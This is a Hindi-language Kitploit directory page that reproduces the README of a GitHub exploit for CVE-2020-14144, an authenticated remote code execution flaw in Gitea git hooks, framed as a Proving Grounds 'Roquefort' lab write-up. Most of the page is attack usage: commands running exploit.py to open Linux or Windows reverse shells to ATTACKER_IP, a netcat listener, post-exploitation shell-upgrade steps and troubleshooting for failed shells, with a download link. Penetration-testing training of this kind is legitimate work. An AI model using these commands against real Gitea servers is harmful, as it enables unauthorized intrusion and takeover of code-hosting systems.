Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Gitea-Git-Hooks-RCE-CVE-2020-14144- — Gitea संस्करण 1.1.0 → 1.12.5 प्रमाणित उपयोगकर्ताओं को "May create git hooks" अनुमति के साथ post-receive hooks में मनमाने शेल कमांड इंजेक्ट करने की अनुमति देते हैं। एक commit पुश करने से hook ट्रिगर होता है और payload सर्वर पर निष्पादित होता है। | Kitploit
उपकरण/GitHubGitHub/mohnad-al-saif/gitea-git-hooks-rce-cve-2020-14144-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubmohnad-al-saif/gitea-git-hooks-rce-cve-2020-14144-

Gitea-Git-Hooks-RCE-CVE-2020-14144-

Gitea संस्करण 1.1.0 → 1.12.5 प्रमाणित उपयोगकर्ताओं को "May create git hooks" अनुमति के साथ post-receive hooks में मनमाने शेल कमांड इंजेक्ट करने की अनुमति देते हैं। एक commit पुश करने से hook ट्रिगर होता है और payload सर्वर पर निष्पादित होता है।

रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Gitea Git Hooks RCE (CVE-2020-14144)

OffsecProvingGrounds अभ्यास — Roquefort मशीन राइटअप और POC

अवलोकन

आइटमविवरण
मशीनRoquefort (Proving Grounds अभ्यास)
OSLinux
Gitea संस्करण1.7.5
CVECVE-2020-14144
वेक्टरगिट हुक्स के माध्यम से प्रमाणित RCE
यूज़र शेलchloe

Gitea संस्करण 1.1.0 → 1.12.5 प्रमाणित उपयोगकर्ताओं को "May create git hooks" अनुमति के साथ post-receive हुक्स में मनमाने शेल कमांड इंजेक्ट करने की अनुमति देते हैं। कमिट पुश करने पर हुक ट्रिगर होता है और सर्वर पर पेलोड निष्पादित हो जाता है।

त्वरित प्रारंभ

स्वचालित (Python स्क्रिप्ट)

root@kitploit:~
# Linux target — reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os linux

# Windows target — PowerShell reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os windows

मैन्युअल

चरण-दर-चरण एक्सप्लॉइटेशन गाइड के लिए MANUAL.md देखें।

रिपॉजिटरी संरचना

root@kitploit:~
.
├── README.md          # This file
├── MANUAL.md          # Manual exploitation guide (Linux + Windows)
└── exploit.py         # Automated exploit script

आवश्यकताएँ

  • Python 3.6+
  • requests लाइब्रेरी (pip install requests)
  • हमलावर मशीन पर git स्थापित हो
  • git हुक अनुमतियों के साथ वैध Gitea क्रेडेंशियल्स

उपयोग

root@kitploit:~
usage: exploit.py [-h] -t TARGET -u USERNAME -p PASSWORD -I REV_IP -P REV_PORT
                  [--os {linux,windows}] [--repo REPO] [-f PAYLOAD_FILE] [-v]

Roquefort — Gitea Authenticated RCE via Git Hooks (CVE-2020-14144)

required arguments:
  -t, --target       Target Gitea URL (e.g. http://192.168.x.x:3000)
  -u, --username     Gitea username
  -p, --password     Gitea password
  -I, --rev-ip       Attacker listener IP
  -P, --rev-port     Attacker listener port

optional arguments:
  --os               Target OS: linux (default) or windows
  --repo             Repository name to create (default: exploit)
  -f, --payload-file Custom shell script payload file
  -v, --verbose      Verbose output

उदाहरण

root@kitploit:~
# 1) Start listener
nc -lvnp 4444

# 2) Run exploit (Linux target)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444

# 3) Run exploit (Windows target)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 --os windows

# 4) Custom payload file
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 -f payload.sh

शेल अपग्रेड (पोस्ट-एक्सप्लॉइटेशन)

रिवर्स शेल पकड़ने के बाद:

root@kitploit:~
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg

समस्या निवारण

समस्यासमाधान
fatal: dubious ownershipशेयर्ड फ़ोल्डरों के बजाय ~ से क्लोन करें, या git config --global --add safe.directory '*' चलाएँ
कोई कनेक्शन प्राप्त नहीं हुआहमलावर IP सत्यापित करें, फ़ायरवॉल जाँचें, दोनों मशीनें एक ही सबनेट पर हैं इसकी पुष्टि करें
हुक चलता है लेकिन शेल नहीं मिलतापहले touch /tmp/pwned पेलोड से परीक्षण करें — यदि फ़ाइल दिखाई देती है, तो रिवर्स शेल ब्लॉक हो रहा है
हुक्स पर अनुमति अस्वीकृतउपयोगकर्ता के पास हुक अनुमतियाँ नहीं हैं — उसे एडमिन या "May create git hooks" विशेषाधिकार चाहिए
3000 पर पोर्ट विरोधGitea 3000 का उपयोग करता है — अपने लिसनर के लिए 4444 जैसा दूसरा पोर्ट उपयोग करें

संदर्भ

  • CVE-2020-14144 — NVD
  • Gitea Issue #13058
  • p0dalirius मूल POC

अस्वीकरण

यह टूल केवल अधिकृत पेनेट्रेशन टेस्टिंग और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें